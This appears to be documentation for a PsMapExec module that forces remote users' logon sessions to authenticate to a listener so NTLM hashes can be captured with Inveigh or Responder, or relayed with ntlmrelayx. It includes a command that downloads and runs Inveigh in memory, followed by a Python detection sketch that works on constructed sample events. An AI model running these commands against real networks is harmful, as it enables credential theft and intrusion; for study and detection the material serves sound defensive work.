Creates a cmd.exe process in each user logon session on the remote system and connects back to a non-existent share on the host specified by -ListenerIP. This can then be used with tools such as Inveigh or Responder to capture NTLMv2 hashes, or with ntlmrelayx to relay captured hashes.
For example, given the quser output below, the remote host currently has the users standarduser and srv2019-admin in existing logon sessions. PsMapExec can force each of these users to connect to a non-existent share on a listener, where their NTLMv1 or NTLMv2 hashes can be captured.
```text
C:\Users\SRV2019-Admin>quser
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 standarduser                              1  Disc            7  04/08/2024 17:14
 srv2019-admin         console             2  Active       none  04/08/2024 17:18
```
Supported methods:

- SMB
- SessionHunter (WMI)
- WMI
- WinRM
| Parameter | Value | Description |
|---|---|---|
| -ShowOutput | N/A | Displays each target's output to the console |
| -SuccessOnly | N/A | Displays only successful results |
Before using the module, ensure a listener such as Inveigh or Responder is running. The below example covers usage for capturing hashes with Inveigh.
```powershell
# Load Inveigh into memory
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1)

# Execute Inveigh (as admin), making sure to specify the current system's IP address
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y -IP 10.10.10.7

# Run PsMapExec, making sure -ListenerIP is set to the same IP address as above
PsMapExec -Targets all -Method wmi -Module sessionrelay -ListenerIP 10.10.10.7
```
(Screenshot: execution in PsMapExec)

(Screenshot: Inveigh output)
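From the detection side, as an added example that is not part of PsMapExec or this page: the host-side footprint of the module is several cmd.exe processes spawned by the WMI provider host under different logon sessions within a short window, each referencing a UNC path to a bare IP address. The Python below flags that pattern in process-creation events. The event records and the exact command line are constructed samples (the command PsMapExec actually runs is not documented here and is an assumption).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation events (Sysmon Event ID 1 style fields), not real
# telemetry. Two cmd.exe processes spawned by WmiPrvSE.exe seconds apart, under the
# two logon sessions from the quser output, each touching a UNC path to an IP. The
# last event is benign: an interactive admin mapping a share by hostname.
SAMPLE_EVENTS = [
    {"time": "2024-08-04T17:20:01", "host": "SRV2019", "user": "CORP\\standarduser",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c dir \\10.10.10.7\nonexistent"},   # assumed command form
    {"time": "2024-08-04T17:20:02", "host": "SRV2019", "user": "SRV2019\\srv2019-admin",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c dir \\10.10.10.7\nonexistent"},
    {"time": "2024-08-04T17:25:00", "host": "SRV2019", "user": "SRV2019\\srv2019-admin",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c net use Z: \\fileserver\share"},
]

# A UNC path whose server component is a dotted-quad IP rather than a hostname.
UNC_TO_IP = re.compile(r"\\\\(\d{1,3}(?:\.\d{1,3}){3})\\")


def find_session_relay(events, window_seconds=30, min_users=2):
    """Return (host, listener_ip, users) tuples where at least min_users distinct
    accounts ran a WMI-spawned cmd.exe against the same IP-addressed UNC path
    within window_seconds. A single hit is not reported: one user touching a
    share by IP is common, several sessions doing it at once is the relay pattern."""
    candidates = []
    for e in events:
        if not e["image"].lower().endswith(r"\cmd.exe"):
            continue
        if not e["parent"].lower().endswith(r"\wmiprvse.exe"):
            continue
        m = UNC_TO_IP.search(e["cmdline"])
        if m:
            candidates.append((datetime.fromisoformat(e["time"]), e["host"], m.group(1), e["user"]))
    candidates.sort()  # time order, so each per-key list below is chronological
    by_key = defaultdict(list)
    for t, host, ip, user in candidates:
        by_key[(host, ip)].append((t, user))
    alerts = []
    for (host, ip), items in by_key.items():
        for t0, _ in items:  # slide a window forward from each hit
            users = {u for t, u in items if t0 <= t <= t0 + timedelta(seconds=window_seconds)}
            if len(users) >= min_users:
                alerts.append((host, ip, tuple(sorted(users))))
                break
    return alerts
```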